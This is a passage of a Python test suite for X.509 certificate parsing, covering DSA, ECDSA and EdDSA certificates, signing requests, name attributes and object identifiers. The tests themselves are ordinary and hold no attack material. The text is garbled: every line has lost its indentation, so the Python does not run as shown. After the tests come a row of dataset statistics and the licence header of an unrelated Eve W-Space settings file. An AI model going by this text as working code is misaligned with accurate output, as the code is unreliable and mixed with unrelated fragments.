b"a8648ce380401308202200282010100bfade6048e373cd4e48b677e878c8e5b"
b"08c02102ae04eb2cb5c46a523a3af1c73d16b24f34a4964781ae7e50500e217"
b"77754a670bd19a7420d633084e5556e33ca2c0e7d547ea5f46a07a01bf8669a"
b"e3bdec042d9b2ae5e6ecf49f00ba9dac99ab6eff140d2cedf722ee62c2f9736"
b"857971444c25d0a33d2017dc36d682a1054fe2a9428dda355a851ce6e6d61e0"
b"3e419fd4ca4e703313743d86caa885930f62ed5bf342d8165627681e9cc3244"
b"ba72aa22148400a6bbe80154e855d042c9dc2a3405f1e517be9dea50562f56d"
b"a93f6085f844a7e705c1f043e65751c583b80d29103e590ccb26efdaa0893d8"
b"33e36468f3907cfca788a3cb790f0341c8a31bf021500822ff5d234e073b901"
b"cf5941f58e1f538e71d40d028201004b7ced71dc353965ecc10d441a9a06fc2"
b"4943a32d66429dd5ef44d43e67d789d99770aec32c0415dc92970880872da45"
b"fef8dd1e115a3e4801387ba6d755861f062fd3b6e9ea8e2641152339b828315"
b"b1528ee6c7b79458d21f3db973f6fc303f9397174c2799dd2351282aa2d8842"
b"c357a73495bbaac4932786414c55e60d73169f5761036fba29e9eebfb049f8a"
b"3b1b7cee6f3fbfa136205f130bee2cf5b9c38dc1095d4006f2e73335c07352c"
b"64130a1ab2b89f13b48f628d3cc3868beece9bb7beade9f830eacc6fa241425"
b"c0b3fcc0df416a0c89f7bf35668d765ec95cdcfbe9caff49cfc156c668c76fa"
b"6247676a6d3ac945844a083509c6a1b436baca0382010500028201004c08bfe"
b"5f2d76649c80acf7d431f6ae2124b217abc8c9f6aca776ddfa9453b6656f13e"
b"543684cd5f6431a314377d2abfa068b7080cb8ddc065afc2dea559f0b584c97"
b"a2b235b9b69b46bc6de1aed422a6f341832618bcaae2198aba388099dafb05f"
b"f0b5efecb3b0ae169a62e1c72022af50ae68af3b033c18e6eec1f7df4692c45"
b"6ccafb79cc7e08da0a5786e9816ceda651d61b4bb7b81c2783da97cea62df67"
b"af5e85991fdc13aff10fc60e06586386b96bb78d65750f542f86951e05a6d81"
b"baadbcd35a2e5cad4119923ae6a2002091a3d17017f93c52970113cdc119970"
b"b9074ca506eac91c3dd376325df4af6b3911ef267d26623a5a1c5df4a6d13f1"
b"ca381cc3081c9301d0603551d0e04160414a4fb887a13fcdeb303bbae9a1dec"
b"a72f125a541b3081990603551d2304819130818e8014a4fb887a13fcdeb303b"
b"bae9a1deca72f125a541ba16ba4693067310b3009060355040613025553310e"
b"300c060355040813055465786173310f300d0603550407130641757374696e3"
b"121301f060355040a1318496e7465726e657420576964676974732050747920"
b"4c7464311430120603550403130b5079434120445341204341820900a37352e"
b"0b2142f86300c0603551d13040530030101ff"
)
cert.public_key().verify(
cert.signature, cert.tbs_certificate_bytes,
cert.signature_hash_algorithm
)
@pytest.mark.requires_backend_interface(interface=DSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestDSACertificateRequest(object):
@pytest.mark.parametrize(
("path", "loader_func"),
[
[
os.path.join("x509", "requests", "dsa_sha1.pem"),
x509.load_pem_x509_csr
],
[
os.path.join("x509", "requests", "dsa_sha1.der"),
x509.load_der_x509_csr
],
]
)
def test_load_dsa_request(self, path, loader_func, backend):
request = _load_cert(path, loader_func, backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, dsa.DSAPublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
]
def test_signature(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "dsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
assert request.signature == binascii.unhexlify(
b"302c021461d58dc028d0110818a7d817d74235727c4acfdf0214097b52e198e"
b"ce95de17273f0a924df23ce9d8188"
)
def test_tbs_certrequest_bytes(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "dsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
assert request.tbs_certrequest_bytes == binascii.unhexlify(
b"3082021802010030573118301606035504030c0f63727970746f677261706879"
b"2e696f310d300b060355040a0c0450794341310b300906035504061302555331"
b"0e300c06035504080c055465786173310f300d06035504070c0641757374696e"
b"308201b63082012b06072a8648ce3804013082011e028181008d7fadbc09e284"
b"aafa69154cea24177004909e519f8b35d685cde5b4ecdc9583e74d370a0f88ad"
b"a98f026f27762fb3d5da7836f986dfcdb3589e5b925bea114defc03ef81dae30"
b"c24bbc6df3d588e93427bba64203d4a5b1687b2b5e3b643d4c614976f89f95a3"
b"8d3e4c89065fba97514c22c50adbbf289163a74b54859b35b7021500835de56b"
b"d07cf7f82e2032fe78949aed117aa2ef0281801f717b5a07782fc2e4e68e311f"
b"ea91a54edd36b86ac634d14f05a68a97eae9d2ef31fb1ef3de42c3d100df9ca6"
b"4f5bdc2aec7bfdfb474cf831fea05853b5e059f2d24980a0ac463f1e818af352"
b"3e3cb79a39d45fa92731897752842469cf8540b01491024eaafbce6018e8a1f4"
b"658c343f4ba7c0b21e5376a21f4beb8491961e038184000281800713f07641f6"
b"369bb5a9545274a2d4c01998367fb371bb9e13436363672ed68f82174c2de05c"
b"8e839bc6de568dd50ba28d8d9d8719423aaec5557df10d773ab22d6d65cbb878"
b"04a697bc8fd965b952f9f7e850edf13c8acdb5d753b6d10e59e0b5732e3c82ba"
b"fa140342bc4a3bba16bd0681c8a6a2dbbb7efe6ce2b8463b170ba000"
)
request.public_key().verify(
request.signature,
request.tbs_certrequest_bytes,
request.signature_hash_algorithm
)
@pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestECDSACertificate(object):
def test_load_ecdsa_cert(self, backend):
_skip_curve_unsupported(backend, ec.SECP384R1())
cert = _load_cert(
os.path.join("x509", "ecdsa_root.pem"),
x509.load_pem_x509_certificate,
backend
)
assert isinstance(cert.signature_hash_algorithm, hashes.SHA384)
public_key = cert.public_key()
assert isinstance(public_key, ec.EllipticCurvePublicKey)
num = public_key.public_numbers()
assert num.x == int(
"dda7d9bb8ab80bfb0b7f21d2f0bebe73f3335d1abc34eadec69bbcd095f"
"6f0ccd00bba615b51467e9e2d9fee8e630c17", 16
)
assert num.y == int(
"ec0770f5cf842e40839ce83f416d3badd3a4145936789d0343ee10136c7"
"2deae88a7a16bb543ce67dc23ff031ca3e23e", 16
)
assert isinstance(num.curve, ec.SECP384R1)
def test_signature(self, backend):
cert = _load_cert(
os.path.join("x509", "ecdsa_root.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.signature == binascii.unhexlify(
b"3065023100adbcf26c3f124ad12d39c30a099773f488368c8827bbe6888d5085"
b"a763f99e32de66930ff1ccb1098fdd6cabfa6b7fa0023039665bc2648db89e50"
b"dca8d549a2edc7dcd1497f1701b8c8868f4e8c882ba89aa98ac5d100bdf854e2"
b"9ae55b7cb32717"
)
r, s = decode_dss_signature(cert.signature)
assert r == int(
"adbcf26c3f124ad12d39c30a099773f488368c8827bbe6888d5085a763f99e32"
"de66930ff1ccb1098fdd6cabfa6b7fa0",
16
)
assert s == int(
"39665bc2648db89e50dca8d549a2edc7dcd1497f1701b8c8868f4e8c882ba89a"
"a98ac5d100bdf854e29ae55b7cb32717",
16
)
def test_tbs_certificate_bytes(self, backend):
_skip_curve_unsupported(backend, ec.SECP384R1())
cert = _load_cert(
os.path.join("x509", "ecdsa_root.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.tbs_certificate_bytes == binascii.unhexlify(
b"308201c5a0030201020210055556bcf25ea43535c3a40fd5ab4572300a06082"
b"a8648ce3d0403033061310b300906035504061302555331153013060355040a"
b"130c446967694365727420496e6331193017060355040b13107777772e64696"
b"769636572742e636f6d3120301e06035504031317446967694365727420476c"
b"6f62616c20526f6f74204733301e170d3133303830313132303030305a170d3"
b"338303131353132303030305a3061310b300906035504061302555331153013"
b"060355040a130c446967694365727420496e6331193017060355040b1310777"
b"7772e64696769636572742e636f6d3120301e06035504031317446967694365"
b"727420476c6f62616c20526f6f742047333076301006072a8648ce3d0201060"
b"52b8104002203620004dda7d9bb8ab80bfb0b7f21d2f0bebe73f3335d1abc34"
b"eadec69bbcd095f6f0ccd00bba615b51467e9e2d9fee8e630c17ec0770f5cf8"
b"42e40839ce83f416d3badd3a4145936789d0343ee10136c72deae88a7a16bb5"
b"43ce67dc23ff031ca3e23ea3423040300f0603551d130101ff040530030101f"
b"f300e0603551d0f0101ff040403020186301d0603551d0e04160414b3db48a4"
b"f9a1c5d8ae3641cc1163696229bc4bc6"
)
cert.public_key().verify(
cert.signature, cert.tbs_certificate_bytes,
ec.ECDSA(cert.signature_hash_algorithm)
)
def test_load_ecdsa_no_named_curve(self, backend):
_skip_curve_unsupported(backend, ec.SECP256R1())
cert = _load_cert(
os.path.join("x509", "custom", "ec_no_named_curve.pem"),
x509.load_pem_x509_certificate,
backend
)
with pytest.raises(NotImplementedError):
cert.public_key()
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
class TestECDSACertificateRequest(object):
@pytest.mark.parametrize(
("path", "loader_func"),
[
[
os.path.join("x509", "requests", "ec_sha256.pem"),
x509.load_pem_x509_csr
],
[
os.path.join("x509", "requests", "ec_sha256.der"),
x509.load_der_x509_csr
],
]
)
def test_load_ecdsa_certificate_request(self, path, loader_func, backend):
_skip_curve_unsupported(backend, ec.SECP384R1())
request = _load_cert(path, loader_func, backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA256)
public_key = request.public_key()
assert isinstance(public_key, ec.EllipticCurvePublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
]
def test_signature(self, backend):
_skip_curve_unsupported(backend, ec.SECP384R1())
request = _load_cert(
os.path.join("x509", "requests", "ec_sha256.pem"),
x509.load_pem_x509_csr,
backend
)
assert request.signature == binascii.unhexlify(
b"306502302c1a9f7de8c1787332d2307a886b476a59f172b9b0e250262f3238b1"
b"b45ee112bb6eb35b0fb56a123b9296eb212dffc302310094cf440c95c52827d5"
b"56ae6d76500e3008255d47c29f7ee782ed7558e51bfd76aa45df6d999ed5c463"
b"347fe2382d1751"
)
def test_tbs_certrequest_bytes(self, backend):
_skip_curve_unsupported(backend, ec.SECP384R1())
request = _load_cert(
os.path.join("x509", "requests", "ec_sha256.pem"),
x509.load_pem_x509_csr,
backend
)
assert request.tbs_certrequest_bytes == binascii.unhexlify(
b"3081d602010030573118301606035504030c0f63727970746f6772617068792"
b"e696f310d300b060355040a0c0450794341310b300906035504061302555331"
b"0e300c06035504080c055465786173310f300d06035504070c0641757374696"
b"e3076301006072a8648ce3d020106052b8104002203620004de19b514c0b3c3"
b"ae9b398ea3e26b5e816bdcf9102cad8f12fe02f9e4c9248724b39297ed7582e"
b"04d8b32a551038d09086803a6d3fb91a1a1167ec02158b00efad39c9396462f"
b"accff0ffaf7155812909d3726bd59fde001cff4bb9b2f5af8cbaa000"
)
request.public_key().verify(
request.signature, request.tbs_certrequest_bytes,
ec.ECDSA(request.signature_hash_algorithm)
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestOtherCertificate(object):
def test_unsupported_subject_public_key_info(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom", "unsupported_subject_public_key_info.pem"
),
x509.load_pem_x509_certificate,
backend,
)
with pytest.raises(ValueError):
cert.public_key()
def test_bad_time_in_validity(self, backend):
cert = _load_cert(
os.path.join(
"x509", "badasn1time.pem"
),
x509.load_pem_x509_certificate,
backend,
)
with pytest.raises(ValueError, match='19020701025736Z'):
cert.not_valid_after
class TestNameAttribute(object):
EXPECTED_TYPES = [
(NameOID.COMMON_NAME, _ASN1Type.UTF8String),
(NameOID.COUNTRY_NAME, _ASN1Type.PrintableString),
(NameOID.LOCALITY_NAME, _ASN1Type.UTF8String),
(NameOID.STATE_OR_PROVINCE_NAME, _ASN1Type.UTF8String),
(NameOID.STREET_ADDRESS, _ASN1Type.UTF8String),
(NameOID.ORGANIZATION_NAME, _ASN1Type.UTF8String),
(NameOID.ORGANIZATIONAL_UNIT_NAME, _ASN1Type.UTF8String),
(NameOID.SERIAL_NUMBER, _ASN1Type.PrintableString),
(NameOID.SURNAME, _ASN1Type.UTF8String),
(NameOID.GIVEN_NAME, _ASN1Type.UTF8String),
(NameOID.TITLE, _ASN1Type.UTF8String),
(NameOID.GENERATION_QUALIFIER, _ASN1Type.UTF8String),
(NameOID.X500_UNIQUE_IDENTIFIER, _ASN1Type.UTF8String),
(NameOID.DN_QUALIFIER, _ASN1Type.PrintableString),
(NameOID.PSEUDONYM, _ASN1Type.UTF8String),
(NameOID.USER_ID, _ASN1Type.UTF8String),
(NameOID.DOMAIN_COMPONENT, _ASN1Type.IA5String),
(NameOID.EMAIL_ADDRESS, _ASN1Type.IA5String),
(NameOID.JURISDICTION_COUNTRY_NAME, _ASN1Type.PrintableString),
(NameOID.JURISDICTION_LOCALITY_NAME, _ASN1Type.UTF8String),
(
NameOID.JURISDICTION_STATE_OR_PROVINCE_NAME,
_ASN1Type.UTF8String
),
(NameOID.BUSINESS_CATEGORY, _ASN1Type.UTF8String),
(NameOID.POSTAL_ADDRESS, _ASN1Type.UTF8String),
(NameOID.POSTAL_CODE, _ASN1Type.UTF8String),
]
def test_default_types(self):
for oid, asn1_type in TestNameAttribute.EXPECTED_TYPES:
na = x509.NameAttribute(oid, u"US")
assert na._type == asn1_type
def test_alternate_type(self):
na2 = x509.NameAttribute(
NameOID.COMMON_NAME, u"common", _ASN1Type.IA5String
)
assert na2._type == _ASN1Type.IA5String
def test_init_bad_oid(self):
with pytest.raises(TypeError):
x509.NameAttribute(None, u'value')
def test_init_bad_value(self):
with pytest.raises(TypeError):
x509.NameAttribute(
x509.ObjectIdentifier('2.999.1'),
b'bytes'
)
def test_init_none_value(self):
with pytest.raises(TypeError):
x509.NameAttribute(NameOID.ORGANIZATION_NAME, None)
def test_init_bad_country_code_value(self):
with pytest.raises(ValueError):
x509.NameAttribute(
NameOID.COUNTRY_NAME,
u'United States'
)
# unicode string of length 2, but > 2 bytes
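# (each U+1F37A encodes to 4 bytes in UTF-8, so this 2-character value
# occupies 8 bytes and fails the 2-byte country-code length check)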
with pytest.raises(ValueError):
x509.NameAttribute(
NameOID.COUNTRY_NAME,
u'\U0001F37A\U0001F37A'
)
def test_invalid_type(self):
with pytest.raises(TypeError):
x509.NameAttribute(NameOID.COMMON_NAME, u"common", "notanenum")
def test_eq(self):
assert x509.NameAttribute(
x509.ObjectIdentifier('2.999.1'), u'value'
) == x509.NameAttribute(
x509.ObjectIdentifier('2.999.1'), u'value'
)
def test_ne(self):
assert x509.NameAttribute(
x509.ObjectIdentifier('2.5.4.3'), u'value'
) != x509.NameAttribute(
x509.ObjectIdentifier('2.5.4.5'), u'value'
)
assert x509.NameAttribute(
x509.ObjectIdentifier('2.999.1'), u'value'
) != x509.NameAttribute(
x509.ObjectIdentifier('2.999.1'), u'value2'
)
assert x509.NameAttribute(
x509.ObjectIdentifier('2.999.2'), u'value'
) != object()
def test_repr(self):
na = x509.NameAttribute(x509.ObjectIdentifier('2.5.4.3'), u'value')
if not six.PY2:
assert repr(na) == (
"<NameAttribute(oid=<ObjectIdentifier(oid=2.5.4.3, name=commo"
"nName)>, value='value')>"
)
else:
assert repr(na) == (
"<NameAttribute(oid=<ObjectIdentifier(oid=2.5.4.3, name=commo"
"nName)>, value=u'value')>"
)
def test_distinguished_name(self):
# Escaping
na = x509.NameAttribute(NameOID.COMMON_NAME, u'James "Jim" Smith, III')
assert na.rfc4514_string() == r'CN=James \"Jim\" Smith\, III'
na = x509.NameAttribute(NameOID.USER_ID, u'# escape+,;\0this ')
assert na.rfc4514_string() == r'UID=\# escape\+\,\;\00this\ '
# Nonstandard attribute OID
na = x509.NameAttribute(NameOID.EMAIL_ADDRESS, u'somebody@example.com')
assert (na.rfc4514_string() ==
'1.2.840.113549.1.9.1=somebody@example.com')
def test_empty_value(self):
na = x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'')
assert na.rfc4514_string() == r'ST='
class TestRelativeDistinguishedName(object):
def test_init_empty(self):
with pytest.raises(ValueError):
x509.RelativeDistinguishedName([])
def test_init_not_nameattribute(self):
with pytest.raises(TypeError):
x509.RelativeDistinguishedName(["not-a-NameAttribute"])
def test_init_duplicate_attribute(self):
with pytest.raises(ValueError):
x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'val1'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'val1'),
])
def test_hash(self):
rdn1 = x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2'),
])
rdn2 = x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
])
rdn3 = x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value3'),
])
assert hash(rdn1) == hash(rdn2)
assert hash(rdn1) != hash(rdn3)
def test_eq(self):
rdn1 = x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2'),
])
rdn2 = x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
])
assert rdn1 == rdn2
def test_ne(self):
rdn1 = x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2'),
])
rdn2 = x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value3'),
])
assert rdn1 != rdn2
assert rdn1 != object()
def test_iter_input(self):
# Order must be preserved too
attrs = [
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value2'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value3')
]
rdn = x509.RelativeDistinguishedName(iter(attrs))
assert list(rdn) == attrs
assert list(rdn) == attrs
def test_get_attributes_for_oid(self):
oid = x509.ObjectIdentifier('2.999.1')
attr = x509.NameAttribute(oid, u'value1')
rdn = x509.RelativeDistinguishedName([attr])
assert rdn.get_attributes_for_oid(oid) == [attr]
assert rdn.get_attributes_for_oid(x509.ObjectIdentifier('1.2.3')) == []
class TestObjectIdentifier(object):
def test_eq(self):
oid1 = x509.ObjectIdentifier('2.999.1')
oid2 = x509.ObjectIdentifier('2.999.1')
assert oid1 == oid2
def test_ne(self):
oid1 = x509.ObjectIdentifier('2.999.1')
assert oid1 != x509.ObjectIdentifier('2.999.2')
assert oid1 != object()
def test_repr(self):
oid = x509.ObjectIdentifier("2.5.4.3")
assert repr(oid) == "<ObjectIdentifier(oid=2.5.4.3, name=commonName)>"
oid = x509.ObjectIdentifier("2.999.1")
assert repr(oid) == "<ObjectIdentifier(oid=2.999.1, name=Unknown OID)>"
def test_name_property(self):
oid = x509.ObjectIdentifier("2.5.4.3")
assert oid._name == 'commonName'
oid = x509.ObjectIdentifier("2.999.1")
assert oid._name == 'Unknown OID'
def test_too_short(self):
with pytest.raises(ValueError):
x509.ObjectIdentifier("1")
def test_invalid_input(self):
with pytest.raises(ValueError):
x509.ObjectIdentifier("notavalidform")
def test_invalid_node1(self):
with pytest.raises(ValueError):
x509.ObjectIdentifier("7.1.37")
def test_invalid_node2(self):
with pytest.raises(ValueError):
x509.ObjectIdentifier("1.50.200")
def test_valid(self):
x509.ObjectIdentifier("0.35.200")
x509.ObjectIdentifier("1.39.999")
x509.ObjectIdentifier("2.5.29.3")
x509.ObjectIdentifier("2.999.37.5.22.8")
x509.ObjectIdentifier("2.25.305821105408246119474742976030998643995")
class TestName(object):
def test_eq(self):
ava1 = x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1')
ava2 = x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2')
name1 = x509.Name([ava1, ava2])
name2 = x509.Name([
x509.RelativeDistinguishedName([ava1]),
x509.RelativeDistinguishedName([ava2]),
])
name3 = x509.Name([x509.RelativeDistinguishedName([ava1, ava2])])
name4 = x509.Name([x509.RelativeDistinguishedName([ava2, ava1])])
assert name1 == name2
assert name3 == name4
def test_ne(self):
ava1 = x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1')
ava2 = x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2')
name1 = x509.Name([ava1, ava2])
name2 = x509.Name([ava2, ava1])
name3 = x509.Name([x509.RelativeDistinguishedName([ava1, ava2])])
assert name1 != name2
assert name1 != name3
assert name1 != object()
def test_hash(self):
ava1 = x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1')
ava2 = x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2')
name1 = x509.Name([ava1, ava2])
name2 = x509.Name([
x509.RelativeDistinguishedName([ava1]),
x509.RelativeDistinguishedName([ava2]),
])
name3 = x509.Name([ava2, ava1])
name4 = x509.Name([x509.RelativeDistinguishedName([ava1, ava2])])
name5 = x509.Name([x509.RelativeDistinguishedName([ava2, ava1])])
assert hash(name1) == hash(name2)
assert hash(name1) != hash(name3)
assert hash(name1) != hash(name4)
assert hash(name4) == hash(name5)
def test_iter_input(self):
attrs = [
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1')
]
name = x509.Name(iter(attrs))
assert list(name) == attrs
assert list(name) == attrs
def test_rdns(self):
rdn1 = x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1')
rdn2 = x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2')
name1 = x509.Name([rdn1, rdn2])
assert name1.rdns == [
x509.RelativeDistinguishedName([rdn1]),
x509.RelativeDistinguishedName([rdn2]),
]
name2 = x509.Name([x509.RelativeDistinguishedName([rdn1, rdn2])])
assert name2.rdns == [x509.RelativeDistinguishedName([rdn1, rdn2])]
@pytest.mark.parametrize(
("common_name", "org_name", "expected_repr"),
[
(
u'cryptography.io',
u'PyCA',
"<Name(CN=cryptography.io,O=PyCA)>",
),
(
u'Certificación',
u'Certificación',
"<Name(CN=Certificación,O=Certificación)>",
),
])
def test_repr(self, common_name, org_name, expected_repr):
name = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, common_name),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, org_name),
])
assert repr(name) == expected_repr
def test_rfc4514_string(self):
n = x509.Name([
x509.RelativeDistinguishedName([
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u'net'),
]),
x509.RelativeDistinguishedName([
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u'example'),
]),
x509.RelativeDistinguishedName([
x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, u'Sales'),
x509.NameAttribute(NameOID.COMMON_NAME, u'J. Smith'),
]),
])
assert (n.rfc4514_string() ==
'OU=Sales+CN=J. Smith,DC=example,DC=net')
def test_rfc4514_string_empty_values(self):
n = x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u''),
x509.NameAttribute(NameOID.LOCALITY_NAME, u''),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
])
assert (n.rfc4514_string() == 'CN=cryptography.io,O=PyCA,L=,ST=,C=US')
def test_not_nameattribute(self):
with pytest.raises(TypeError):
x509.Name(["not-a-NameAttribute"])
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_bytes(self, backend):
name = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
])
assert name.public_bytes(backend) == binascii.unhexlify(
b"30293118301606035504030c0f63727970746f6772617068792e696f310d300"
b"b060355040a0c0450794341"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_bmpstring_bytes(self, backend):
# For this test we need an odd length string. BMPString is UCS-2
# encoded so it will always be even length and OpenSSL will error if
# you pass an odd length string without encoding it properly first.
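# For reference: u'cryptography.io' (15 characters) becomes 30 bytes in
# UCS-2/UTF-16-BE (b"\x00c\x00r..."), which appears below as a BMPString
# (tag 0x1e) with length 0x1e.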
name = x509.Name([
x509.NameAttribute(
NameOID.COMMON_NAME,
u'cryptography.io',
_ASN1Type.BMPString
),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
])
assert name.public_bytes(backend) == binascii.unhexlify(
b"30383127302506035504031e1e00630072007900700074006f00670072006100"
b"7000680079002e0069006f310d300b060355040a0c0450794341"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_universalstring_bytes(self, backend):
# UniversalString is UCS-4
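# e.g. u"a".encode("utf_32_be") == b"\x00\x00\x00a"; the 15-character CN
# therefore occupies 60 bytes (0x3c) in the encoded name below (tag 0x1c).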
name = x509.Name([
x509.NameAttribute(
NameOID.COMMON_NAME,
u'cryptography.io',
_ASN1Type.UniversalString
),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
])
assert name.public_bytes(backend) == binascii.unhexlify(
b"30563145304306035504031c3c00000063000000720000007900000070000000"
b"740000006f000000670000007200000061000000700000006800000079000000"
b"2e000000690000006f310d300b060355040a0c0450794341"
)
@pytest.mark.supported(
only_if=lambda backend: backend.ed25519_supported(),
skip_message="Requires OpenSSL with Ed25519 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestEd25519Certificate(object):
def test_load_pem_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "ed25519", "root-ed25519.pem"),
x509.load_pem_x509_certificate,
backend
)
# self-signed, so this will work
cert.public_key().verify(cert.signature, cert.tbs_certificate_bytes)
assert isinstance(cert, x509.Certificate)
assert cert.serial_number == 9579446940964433301
assert cert.signature_hash_algorithm is None
assert cert.signature_algorithm_oid == SignatureAlgorithmOID.ED25519
@pytest.mark.supported(
only_if=lambda backend: backend.ed448_supported(),
skip_message="Requires OpenSSL with Ed448 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestEd448Certificate(object):
def test_load_pem_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "ed448", "root-ed448.pem"),
x509.load_pem_x509_certificate,
backend
)
# self-signed, so this will work
cert.public_key().verify(cert.signature, cert.tbs_certificate_bytes)
assert isinstance(cert, x509.Certificate)
assert cert.serial_number == 448
assert cert.signature_hash_algorithm is None
assert cert.signature_algorithm_oid == SignatureAlgorithmOID.ED448
def test_random_serial_number(monkeypatch):
sample_data = os.urandom(20)
def notrandom(size):
assert size == len(sample_data)
return sample_data
monkeypatch.setattr(os, "urandom", notrandom)
serial_number = x509.random_serial_number()
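# random_serial_number() reads 20 random bytes and shifts the resulting
# integer right by one bit, so the value is non-negative and at most 159
# bits -- safely within RFC 5280's 20-octet limit for serial numbers.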
assert (
serial_number == utils.int_from_bytes(sample_data, "big") >> 1
)
assert serial_number.bit_length() < 160
| 39.992327 | 79 | 0.625925 | 18,536 | 187,644 | 6.090742 | 0.059236 | 0.053606 | 0.065475 | 0.028769 | 0.76818 | 0.74004 | 0.712891 | 0.677328 | 0.641597 | 0.61157 | 0 | 0.121358 | 0.280084 | 187,644 | 4,691 | 80 | 40.000853 | 0.714379 | 0.011527 | 0 | 0.62299 | 0 | 0.00072 | 0.117261 | 0.074783 | 0 | 0 | 0 | 0 | 0.092633 | 1 | 0.055916 | false | 0.00024 | 0.00552 | 0 | 0.067675 | 0.00384 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c6fb68062cf367ed6e9e36afe007ca0ca5f2f0c | 866 | py | Python | evewspace/Teamspeak/default_settings.py | gpapaz/eve-wspace | 6b46d120c5ca8d27546113f51fd74fd7797dcbfc | [
"Apache-2.0"
] | null | null | null | evewspace/Teamspeak/default_settings.py | gpapaz/eve-wspace | 6b46d120c5ca8d27546113f51fd74fd7797dcbfc | [
"Apache-2.0"
] | null | null | null | evewspace/Teamspeak/default_settings.py | gpapaz/eve-wspace | 6b46d120c5ca8d27546113f51fd74fd7797dcbfc | [
"Apache-2.0"
] | null | null | null | # Eve W-Space
# Copyright 2014 Andrew Austin and contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
